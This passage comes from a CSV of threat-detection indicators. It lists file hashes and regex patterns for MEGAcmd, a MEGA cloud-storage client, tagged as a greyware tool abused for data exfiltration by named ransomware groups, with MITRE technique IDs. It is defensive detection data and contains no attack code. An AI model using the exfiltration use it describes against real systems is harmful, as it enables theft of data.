Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*167d72cbaa49b8c6c54d57ab44ad9e907f4bf9551460574f4231a9dd956c4c32*",".{0,1000}167d72cbaa49b8c6c54d57ab44ad9e907f4bf9551460574f4231a9dd956c4c32.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*1e55e2b5357bce9f5fa54d2a12801dfba6c70262a6ddceae4b227a014db0aa92*",".{0,1000}1e55e2b5357bce9f5fa54d2a12801dfba6c70262a6ddceae4b227a014db0aa92.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*20c963d0749b58afccdb7d45ff36451015689bec1c035ee7bf809c7ee5b6b483*",".{0,1000}20c963d0749b58afccdb7d45ff36451015689bec1c035ee7bf809c7ee5b6b483.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*233717710c3ac45906e2cbd110a167d7779bd6697a508013c5b6559bbce97815*",".{0,1000}233717710c3ac45906e2cbd110a167d7779bd6697a508013c5b6559bbce97815.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*24d85b5700f05d7b638d294c87e8b8809df80f0611c63ee818f60ed487f1b4bc*",".{0,1000}24d85b5700f05d7b638d294c87e8b8809df80f0611c63ee818f60ed487f1b4bc.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*2cc646024fa74ade8763e8e9d030eaab511fb96b4c6cbac1059beae4e7654cb6*",".{0,1000}2cc646024fa74ade8763e8e9d030eaab511fb96b4c6cbac1059beae4e7654cb6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*2d98d3ea74419cd604113a4ccf8a360ebf31d8da740219c4c1f426cfe13afe5b*",".{0,1000}2d98d3ea74419cd604113a4ccf8a360ebf31d8da740219c4c1f426cfe13afe5b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*2ff46b2628610c91de2378a820fc1290e40c1d28029da8609a338ba7efe2a684*",".{0,1000}2ff46b2628610c91de2378a820fc1290e40c1d28029da8609a338ba7efe2a684.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*30612705f43fb5234efab3db8ec78568c8392cdf652cd5b7ef95c31a1876c670*",".{0,1000}30612705f43fb5234efab3db8ec78568c8392cdf652cd5b7ef95c31a1876c670.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*30fe5d62f0f47418dc83e03bc80977426010c8edcf01e4e7db820965e2781442*",".{0,1000}30fe5d62f0f47418dc83e03bc80977426010c8edcf01e4e7db820965e2781442.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*319a1fbefb63c3be58dcf357864f13ff21c664f0c15e535ac87723955e7826b1*",".{0,1000}319a1fbefb63c3be58dcf357864f13ff21c664f0c15e535ac87723955e7826b1.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*36a3dedaed8d89acb2703ab54c0f7ded489a1210b8e21935e970bddd3115e87c*",".{0,1000}36a3dedaed8d89acb2703ab54c0f7ded489a1210b8e21935e970bddd3115e87c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*383f712ce7d07385f41a48f0965db96ac74bea74e7eae0c297d973ad5a9be620*",".{0,1000}383f712ce7d07385f41a48f0965db96ac74bea74e7eae0c297d973ad5a9be620.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6*",".{0,1000}38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6*",".{0,1000}38744af426f8304c5ee9c2857291225726bffe2788870f2cb9e6a3b8836297e6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*3d74803de0136e858f96678e1cdea410256fbf34fc83c54edd204d186ecd412e*",".{0,1000}3d74803de0136e858f96678e1cdea410256fbf34fc83c54edd204d186ecd412e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*3e1b11f8d4839e0d7f09b7cc27a6d10a82b5944512a59dfa9192603f28b50baf*",".{0,1000}3e1b11f8d4839e0d7f09b7cc27a6d10a82b5944512a59dfa9192603f28b50baf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*44026a4ab85bb59d02241e400848ac77be17c60fc86a0d07055e8ed8fe490ba2*",".{0,1000}44026a4ab85bb59d02241e400848ac77be17c60fc86a0d07055e8ed8fe490ba2.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4a0231a6f5ccb7f5908a9d7f12987efa1b45ff2148214360b4a205f15e77075f*",".{0,1000}4a0231a6f5ccb7f5908a9d7f12987efa1b45ff2148214360b4a205f15e77075f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4c77daadff57f64045bb324c78424a543c7703055d8e1827862e8b9920d541de*",".{0,1000}4c77daadff57f64045bb324c78424a543c7703055d8e1827862e8b9920d541de.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4d4ca15944e2f75e8b86ee2bf92c458a40ed625bdc71e6d7d24d218c370c595b*",".{0,1000}4d4ca15944e2f75e8b86ee2bf92c458a40ed625bdc71e6d7d24d218c370c595b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4e694c7eb85dcf55d7642f3504a5d63493e46ebd711735c57a45569ef2a7b88a*",".{0,1000}4e694c7eb85dcf55d7642f3504a5d63493e46ebd711735c57a45569ef2a7b88a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4e703495f3616dd936afdfa2c32958189ae5e90328d9389b86e49a50654e6393*",".{0,1000}4e703495f3616dd936afdfa2c32958189ae5e90328d9389b86e49a50654e6393.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*4f3adf3695bebc9fbe10e01ab17ac24f71b146ace019a808aba29f8e8ffdecb8*",".{0,1000}4f3adf3695bebc9fbe10e01ab17ac24f71b146ace019a808aba29f8e8ffdecb8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*551acd5364dcb82cadc68a6b1dd317b182fd797c0d6f170ce2ca922ad293fd1d*",".{0,1000}551acd5364dcb82cadc68a6b1dd317b182fd797c0d6f170ce2ca922ad293fd1d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*567d6614d077fa3fb569dd7a3d8fec5c0b3f6b09b0f82528f55337c637e76652*",".{0,1000}567d6614d077fa3fb569dd7a3d8fec5c0b3f6b09b0f82528f55337c637e76652.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*58574690db6cfff0ffa7864a0a13265ae1bd37d5fc3b0d9e0c88a1f7d69c193d*",".{0,1000}58574690db6cfff0ffa7864a0a13265ae1bd37d5fc3b0d9e0c88a1f7d69c193d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*59606376cabc50a19af3732cddbbcda40c59e0c85aa6bc0320420a6a19abca49*",".{0,1000}59606376cabc50a19af3732cddbbcda40c59e0c85aa6bc0320420a6a19abca49.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*5c3128dfd3f4d604afa6e602aca4a346d758d889400eb74584c88f1e40fe9bac*",".{0,1000}5c3128dfd3f4d604afa6e602aca4a346d758d889400eb74584c88f1e40fe9bac.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*5c3e73cd1ce2876596cad9dccb83f6243d0d6720b1059a663a36b084be5108d3*",".{0,1000}5c3e73cd1ce2876596cad9dccb83f6243d0d6720b1059a663a36b084be5108d3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*5e71e62bfed96e5af56135c13f5e0c8ea26e589f8a7b74838d346954455cbbe0*",".{0,1000}5e71e62bfed96e5af56135c13f5e0c8ea26e589f8a7b74838d346954455cbbe0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*5e7d3bce04b582aea59098cb2b11082a63d900c521775d962528564d258f7110*",".{0,1000}5e7d3bce04b582aea59098cb2b11082a63d900c521775d962528564d258f7110.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*61482ef4ebfebd390cc8409ac09b486c61bc71295cdda882e1f9b5b3cd1cea4d*",".{0,1000}61482ef4ebfebd390cc8409ac09b486c61bc71295cdda882e1f9b5b3cd1cea4d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c*",".{0,1000}6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c*",".{0,1000}6364d746c3f1f0329fd67cec0f6a1f09ae3e521f3ef37b0ab728009cf55c4a5c.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*63916d22e904aeae13bc1fb08cc8a6f3f2e165fbf63f348dacdd6acffb780491*",".{0,1000}63916d22e904aeae13bc1fb08cc8a6f3f2e165fbf63f348dacdd6acffb780491.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6678de2dac73cd8adb8e56721871afdee864f06aaf43fb1f854ea793148defd4*",".{0,1000}6678de2dac73cd8adb8e56721871afdee864f06aaf43fb1f854ea793148defd4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*66a2764e71b7eed7243032dd66476e7aa59d9f4667005d8a4190197667fee9b5*",".{0,1000}66a2764e71b7eed7243032dd66476e7aa59d9f4667005d8a4190197667fee9b5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*66fc8fa5564448729b569b843c158d933d8774666651f98cfbd757ea9d721d94*",".{0,1000}66fc8fa5564448729b569b843c158d933d8774666651f98cfbd757ea9d721d94.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*690c56c5ebd58d596632a4ff28596df8aa478309fc979b9eb8b07fb89db4d944*",".{0,1000}690c56c5ebd58d596632a4ff28596df8aa478309fc979b9eb8b07fb89db4d944.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6c20c6297aa22f6d3dcc00987a03ee30d2aff9051ba85832a6e20c3780bc599d*",".{0,1000}6c20c6297aa22f6d3dcc00987a03ee30d2aff9051ba85832a6e20c3780bc599d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6c2523493b48a91d2e484224c86431fddbbfb549d242a52182282ef8077341ae*",".{0,1000}6c2523493b48a91d2e484224c86431fddbbfb549d242a52182282ef8077341ae.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6f0a3e80dcde8611beb4ac1d9e575601997e58b9a4a17054c5cb4eedf6f8062f*",".{0,1000}6f0a3e80dcde8611beb4ac1d9e575601997e58b9a4a17054c5cb4eedf6f8062f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
